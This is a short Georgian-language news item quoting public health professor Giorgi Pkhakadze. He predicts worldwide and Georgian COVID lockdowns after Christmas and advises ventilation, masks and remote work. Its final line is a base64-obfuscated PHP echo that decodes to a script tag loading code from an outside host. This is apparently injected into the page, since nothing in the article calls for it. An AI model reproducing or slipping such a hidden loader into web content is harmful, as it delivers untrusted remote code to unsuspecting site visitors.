celsiusi
ავერსი შნაიდერი
საზოგადოებრივი ჯანდაცვის ექსპერტი, პროფესორი გიორგი ფხაკაძე დღესასწაულების შემდეგ მსოფლიოს მასშტაბით ლოქდაუნებს პროგნოზირებს. მისი მტკიცებით, სხვა ქვეყნების მსგავსად საქართველოც ჩაიკეტება. ფხაკაძე მოსახლეობას და დამსაქმებლებს რეკომენდაციებს აძლევს:
 
"სიტუაცია უფრო რთულია ვიდრე გარედან ჩანს. სახელმწიფოები დაბნეულები არიან; თქვენ დაინახავთ, რომ შობის შემდეგ დაიწყება ლოქდაუნები მთელ მსოფლიოში. ახლა შობაა და ფიქრობენ, რომ როგორმე გადააგორონ ეს დღესასწაულები. საქართველოც ჩაიკეტება, არ ვიცი რა ფორმით, მაგრამ ჩაიკეტება. თუმცა ესეც არ არის გამოსავალი, საჭიროა პრაგმატული ზომების მიღება.
 
რა შეგიძლიათ გააკეთოთ თქვენ - მოერიდეთ დახურულ სივრცეში ყოფნას სხვა ადამიანებთან ერთად, თუ მაინც გიწევთ დახურულ სივრცეში ყოფნა, რაც შეიძლება ხშირად და დიდი ხნით გაანიავეთ ეს სივრცე.
 
გამოიყენეთ სამედიცინო პირბადე, 100-პროცენტიანი დაცვა არც ამას აქვს, მაგრამ თუ ამას ოთახის განიავებაც დაემატება, კარგ შედეგს მოგცემთ.
 
ბიზნესის წარმომადეგენლებო, ამქსიმალურად გაუფრთხილდით თქვენ თანამშრომლებს და რამდენადაც შესაძლებელია, გადაიყვანეთ დისტანციურზე.
 
ტყუილად ხარჯავთ ფულს კორპრორატიულებზე, რადგან მაინც ჩაგეშლებათ, ყოველ შემთხვევაში, რაც ახალი წლის შემდეგ არის დაგეგმილი, ის აუცილებლად ჩაიშლება" - ამბობს ფხაკაძე.
 
 
3594
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");